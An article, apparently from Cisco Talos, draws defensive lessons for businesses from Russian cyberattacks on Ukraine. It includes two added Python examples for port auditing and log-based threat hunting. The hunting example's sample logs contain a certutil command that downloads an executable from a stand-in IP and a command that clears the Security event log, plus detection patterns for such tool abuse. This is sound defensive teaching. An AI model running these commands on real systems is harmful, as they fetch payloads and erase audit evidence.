Russia’s War on Ukraine: 3 Cybersecurity Takeaways for Businesses
Offensive cyber actions are an integral part of modern armed conflicts. The Russian invasion of Ukraine was no exception.
Russia had already shown that it could harm the fledgling democracy through cyber warfare. Since at least 2013, alleged Russian attacks on Ukraine have included attacks on critical national infrastructure, for example the destructive 2017 NotPetya worm, which remains the most destructive cyberattack Ukraine has suffered.
Since the invasion, there has been a continuous onslaught of attacks on both the public and private sectors – but organizations have largely been successful in repelling them. This demonstrates that with proper planning, preparation, and resources, attacks from even the most sophisticated and persistent attackers can be defeated.
Cisco is proud to support the people of Ukraine, both through humanitarian assistance and by securing systems. Working with Ukrainian authorities, we have been providing intelligence and resources to help defeat cyberattacks against the country for more than six years. Since the invasion, Talos has formed a Security Operations Center (SOC) to aggressively hunt threats affecting Ukraine, and it directly supports more than 30 Ukrainian critical infrastructure and government organizations.
Drawing on that experience, we offer three tips to help organizations defend themselves:
Tailor security and defenses to the threats and attacks you face
Proactive defense tailored to your environment makes attacks harder to carry out and easier to detect.
Remove network connections, services, applications, and systems that are no longer needed, and keep only those that are essential to the business. If your company runs many apps that offer similar functionality, standardize on one and retire the others. If certain apps are needed but rarely used, limit access to the people who actually use them.
Similarly, limit access to sensitive data to those who really need it. Many functions are better served by restricted access to subsets or aggregates of the data than by full access to everything.
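Reducing the attack surface starts with knowing what is actually exposed. The following is an added example, not code from the article or from Cisco Talos: it parses the output of `ss -Hlntp` (Linux listening TCP sockets) and compares it with a hypothetical approved baseline for the host, flagging listeners that should not exist, approved services bound more widely than policy allows, and baseline services that are missing. The sample `ss` output, the baseline, and the port policy are all constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample of `ss -Hlntp` output (listening TCP sockets, no header);
# not taken from any real host.
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=1030,fd=5))
LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=1210,fd=6),("nginx",pid=1211,fd=6))
LISTEN 0 50 [::]:2049 [::]:*
LISTEN 0 128 0.0.0.0:5900 0.0.0.0:* users:(("x11vnc",pid=2201,fd=4))
"""

# Hypothetical approved baseline for this host class:
# port -> (allowed process names, must be bound to loopback only).
BASELINE = {
    22: ({"sshd"}, False),
    80: ({"nginx"}, False),
    443: ({"nginx"}, False),
    5432: ({"postgres"}, True),
}

LOOPBACK = {"127.0.0.1", "::1", "[::1]"}
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    procs: tuple  # process names; empty for kernel-owned sockets such as NFS


def parse_ss(text):
    """Parse `ss -Hlntp` lines into Listener records."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")  # handles "[::]:2049" too
        procs = tuple(sorted({m.group(1) for m in PROC_RE.finditer(line)}))
        listeners.append(Listener(addr, int(port), procs))
    return listeners


def audit(listeners, baseline):
    """Compare live listeners with the baseline; return sorted (kind, port, procs) findings."""
    findings = []
    seen = set()
    for l in listeners:
        seen.add(l.port)
        if l.port not in baseline:
            # Not approved at all: candidate for removal (or for an explicit exception).
            findings.append(("unexpected", l.port, l.procs or ("<kernel>",)))
            continue
        allowed, loopback_only = baseline[l.port]
        for p in l.procs:
            if p not in allowed:
                findings.append(("wrong-process", l.port, (p,)))
        if loopback_only and l.addr not in LOOPBACK:
            # Approved service, but reachable from the network when it should not be.
            findings.append(("over-exposed", l.port, l.procs))
    for port in baseline:
        if port not in seen:
            findings.append(("missing", port, tuple(baseline[port][0])))
    return sorted(findings)


if __name__ == "__main__":
    for kind, port, procs in audit(parse_ss(SAMPLE_SS), BASELINE):
        print(f"{kind:13} port {port:<5} {', '.join(procs)}")
```

On the constructed sample this reports the NFS listener on 2049 and the VNC server on 5900 as unexpected, and port 443 as expected but not listening; running the same comparison periodically, with the baseline kept under version control, turns "keep only what is essential" into a repeatable check rather than a one-off cleanup.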
Defend your crown jewels
Know where your most valuable data and systems reside. These are the assets whose compromise or unavailability would cause the most damage to your organization. Ensure that access to them is restricted and that appropriate protections are in place to mitigate threats. Above all, ensure that critical data is not only backed up regularly, but that teams have verified they can actually restore it in the event of damage.
Respond to all incidents, even minor ones
Like any criminal activity, cyberattacks leave evidence at the scene. Even the most sophisticated attackers leave traces that can be discovered, and they may deliberately choose mundane tools to carry out their activity.
Don't overlook or downplay the discovery of a relatively common or unsophisticated malicious tool, or of dual-use software. Attackers frequently gain a foothold in an organization using basic tools before turning to more sophisticated techniques.
If evidence of a breach is detected, trigger the incident response process to remediate the intrusion quickly. Identify the systems the attacker was able to access, where the attacker established persistence, and most importantly how the attacker got past your defenses. Correct any shortcomings before the attacker learns from the failure and adapts.
Remember that no one can monitor all systems all the time. Prioritize monitoring of your most valuable data and systems so that any deviation from normal behavior can be identified and investigated quickly. Regularly drill and rehearse the response to potential incidents so that teams know the steps required and the other teams they need to coordinate with in a real incident.
Traces of an intrusion will be found in system and network logs. Aggregating these logs so they can be queried lets teams actively search for signs of compromise and identify attacks early, before the attacker has had a chance to achieve their objectives or cause damage.
Use threat intelligence to improve security
Pay attention to reports on how attackers have carried out previous attacks. Consider how the malicious techniques and procedures they used would show up in your own system and network logs, and actively search for that evidence of a possible intrusion.
Track and investigate abnormal behavior. Look for systems that behave differently from their peers. In most cases there will be an innocent explanation, but sooner or later you will find something that needs to be rectified.
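The two hunts described above, searching aggregated logs for techniques seen in earlier attacks and looking for hosts that behave differently from their peers, share the same raw material, so the following added example does both over one set of records. It is not code from the article or from Cisco Talos. The process-creation log lines, the host names, and the documentation-range IP address are constructed for illustration; the indicator list is a small, assumed sample of widely reported living-off-the-land patterns (the kind of "mundane" dual-use tooling the article warns against dismissing), not a list the article provides.

```python
import re
from collections import Counter, defaultdict

# Constructed process-creation records as a log aggregator might store them (not real telemetry).
# Each line: timestamp, host, user, process name, full command line.
SAMPLE_LOGS = """\
2024-03-01T09:00:01Z host=ws-01 user=alice proc=outlook.exe cmd="outlook.exe"
2024-03-01T09:00:05Z host=ws-02 user=bob proc=outlook.exe cmd="outlook.exe"
2024-03-01T09:01:10Z host=ws-03 user=carol proc=outlook.exe cmd="outlook.exe"
2024-03-01T09:02:00Z host=ws-01 user=alice proc=excel.exe cmd="excel.exe budget.xlsx"
2024-03-01T09:02:30Z host=ws-02 user=bob proc=excel.exe cmd="excel.exe q1.xlsx"
2024-03-01T09:03:00Z host=ws-03 user=carol proc=excel.exe cmd="excel.exe q1.xlsx"
2024-03-01T10:02:11Z host=ws-03 user=carol proc=certutil.exe cmd="certutil -urlcache -split -f http://203.0.113.5/a.txt a.exe"
2024-03-01T10:02:40Z host=ws-03 user=carol proc=a.exe cmd="a.exe"
2024-03-01T10:05:12Z host=ws-03 user=carol proc=wevtutil.exe cmd="wevtutil cl Security"
2024-03-01T10:06:00Z host=ws-02 user=bob proc=certutil.exe cmd="certutil -verify cert.cer"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) proc=(?P<proc>\S+) cmd="(?P<cmd>[^"]*)"$'
)

# Assumed indicator list distilled from public reporting of common dual-use tool abuse.
# Each entry is a label and a regex applied to the command line.
INDICATORS = [
    ("certutil download", re.compile(r"certutil.*-urlcache", re.I)),
    ("event log cleared", re.compile(r"wevtutil\s+cl\b", re.I)),
    ("remote exec via psexec", re.compile(r"\bpsexec", re.I)),
    ("encoded powershell", re.compile(r"powershell.*-enc(odedcommand)?\b", re.I)),
]


def parse_logs(text):
    """Parse the constructed log format into dicts; lines that do not match are skipped."""
    return [m.groupdict() for m in (LINE_RE.match(l) for l in text.splitlines()) if m]


def hunt_indicators(events, indicators=INDICATORS):
    """Known-technique hunt: (host, timestamp, label) for every command matching an indicator."""
    hits = []
    for e in events:
        for label, rx in indicators:
            if rx.search(e["cmd"]):
                hits.append((e["host"], e["ts"], label))
    return hits


def outlier_processes(events, max_hosts=1):
    """Behavioural hunt: processes seen on at most `max_hosts` hosts in a larger fleet.
    Software every host runs is normal; something that runs on one host alone deserves a look."""
    hosts_by_proc = defaultdict(set)
    for e in events:
        hosts_by_proc[e["proc"].lower()].add(e["host"])
    fleet = {e["host"] for e in events}
    return {p: sorted(h) for p, h in hosts_by_proc.items() if len(h) <= max_hosts < len(fleet)}


def rank_hosts(events):
    """Combine both hunts into a per-host score so analysts know where to look first."""
    score = Counter()
    for host, _, _ in hunt_indicators(events):
        score[host] += 2  # a known technique weighs more than a mere oddity
    for hosts in outlier_processes(events).values():
        for h in hosts:
            score[h] += 1
    return score.most_common()


if __name__ == "__main__":
    events = parse_logs(SAMPLE_LOGS)
    for host, ts, label in hunt_indicators(events):
        print(f"indicator  {host} {ts} {label}")
    for proc, hosts in outlier_processes(events).items():
        print(f"outlier    {proc} only on {', '.join(hosts)}")
    print("triage order:", rank_hosts(events))
```

On the sample, the signature hunt catches the certutil download and the cleared Security log on ws-03 but correctly ignores the benign `certutil -verify` on ws-02, while the peer comparison surfaces `a.exe` and `wevtutil.exe` as programs no other host runs; the two hunts are independent, so either alone would have drawn attention to ws-03 even if the other had been missing an indicator.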
Think like an attacker
No one knows your systems and networks better than the people who maintain and operate them. Engage operations teams in threat hunting, asking them about potential weaknesses or how users have circumvented restrictions. Use their knowledge to improve defenses and devise new threat-hunting strategies.
Typically, attackers seek to do the bare minimum to achieve their goal. If an attacker finds that their attempts to breach your organization fail or they are quickly detected, they will be tempted to move on to an easier target.
A model of security resilience in the face of threats
Passive defense is not enough to counter the complexity, sophistication and persistence of today's threats. Even with security systems in place, the security team should proactively search for hidden threats.
Remember that cybersecurity relies on the dedication and skill of security professionals. Invest in the training and well-being of your teams. Defending against attacks is a 24/7 activity, but defenders are human and need ample downtime to rest and recover if they are to have the mental agility to spot sophisticated intrusions.
Ukraine weathered the storm of Russian cyberaggression because defenders prepared well, actively hunted attacks, and learned from previous incidents how to improve their security posture and hunting techniques.
These learnings provide a useful model that your business can apply to increase its security resilience:
- Custom defenses: Harden systems and identify key systems.
- Active vigilance: Respond to all incidents, even minor ones.
- Proactively hunt: Look for evidence of incursion.
Cyberattacks are carried out by adversaries who have a clear idea of what they want to accomplish. Preventing and detecting attacks is therefore not an activity to be undertaken lightly. With the right focus and resources, even the most sophisticated and persistent attacks can be defeated.
Martin Lee is technical lead for security research at Talos, Cisco's threat intelligence and research organization.